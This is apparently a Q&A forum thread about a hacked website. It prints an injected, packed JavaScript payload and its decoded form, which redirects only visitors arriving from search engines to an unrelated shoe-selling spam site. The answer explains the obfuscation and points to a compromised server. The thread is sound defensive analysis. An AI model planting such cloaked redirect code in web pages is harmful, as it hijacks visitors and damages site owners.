How does this JavaScript hack work?

Question

I've encountered a strange hack of a website that doesn't belong to me, and I'm trying to help the web admin out by identifying the source of the issue. Here's the diagnosis: Google flags the website with a "This website may be hacked" notice. When following the link from Google, you are redirected to a different, completely unrelated page. If I cancel the page load before redirection and then view the source html, I see that there is a little JavaScript snippet inserted at the very beginning of the document, which apparently is causing the redirection. Now here's the strange bit: The malicious JavaScript only appears when navigating to the page from certain search engines like Google or Bing. If you go to the page directly, nothing is wrong, and even if I go to this page from another search engine like DuckDuckGo, nothing is wrong.

The malicious script itself reads . Here is what is at the src link: (with additional tabs and line breaks to make it easier to look at, hopefully)

eval(
    function(p,a,c,k,e,r){
        e=function(c){
            return c.toString(a)
        };
        if(!''.replace(/^/,String)){
            while(c--) 
                r[e(c)]=k[c]||e(c);
            k=[function(e){return r[e]}];
            e=function(){return'\w+'};
            c=1
        };
        while(c--)
            if(k[c]) p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c]);
            return p
    }('4 1=5.6;7(1.2("8")>0||1.2("9")>0||1.2("a")>0||1.2("b")>0){d.e.f=\'g://h.i.j/3-k-3-l-m-n-c-o.p\'}',
    26,
    26,
    '|s|indexOf|nike|var|document|referrer|if|google|bing|yahoo|aol||window|location|href|http|www|soccerxp|com|shoes|mercurial|superfly|fg|1_176|html'.split('|'),
    0,
    {})
)

I haven't analyzed this in detail, but from the document|referrer|if|google|bing|yahoo|aol||window|location|href... part it seems obvious that this is doing the redirection, and moreover the fact that the redirection only occurs for search traffic is a deliberate act on behalf of the hacker.

However, I'm not sure why the script only appears in the source html if you navigate from a search engine. I'm no hacking expert, but this smells like injection into a server side code. The only alternative I can see is if the script somehow manages to delete itself if the referrer is not one of those it cares about. Is this possible?

So the questions are: Is this a known hack, and if so what is the cure? Is there necessarily some deeper problem with the server side scripts, or could this be a purely JavaScript hack?

Possibly relevant information: The website is made using Network Solutions' Image Cafe feature.

Denys S&#233;guret · Accepted Answer

function(p,a,c,k,e,r){ is the signature of one of the script packers used to "encrypt" some code and make it less easily identifiable and readable. But it's stupid and ineffective.

Just change

eval( something )

with

var script = (something);

the you'll see what the encrypted code is :

var s=document.referrer;
if(s.indexOf("google")>0||s.indexOf("bing")>0||s.indexOf("yahoo")>0||s.indexOf("aol")>0){
    window.location.href='http://www.soccerxp.com/nike-shoes-nike-mercurial-superfly-fg-c-1_176.html'
}

So it's just a script changing the location to http://www.soccerxp.... when the user comes from a search engine (as given by referrer).

The real problem the site owner has is that its site could be changed by the attacker. The server's security is compromised and must be fixed.

How does this JavaScript hack work?

Answers (2)

Related Questions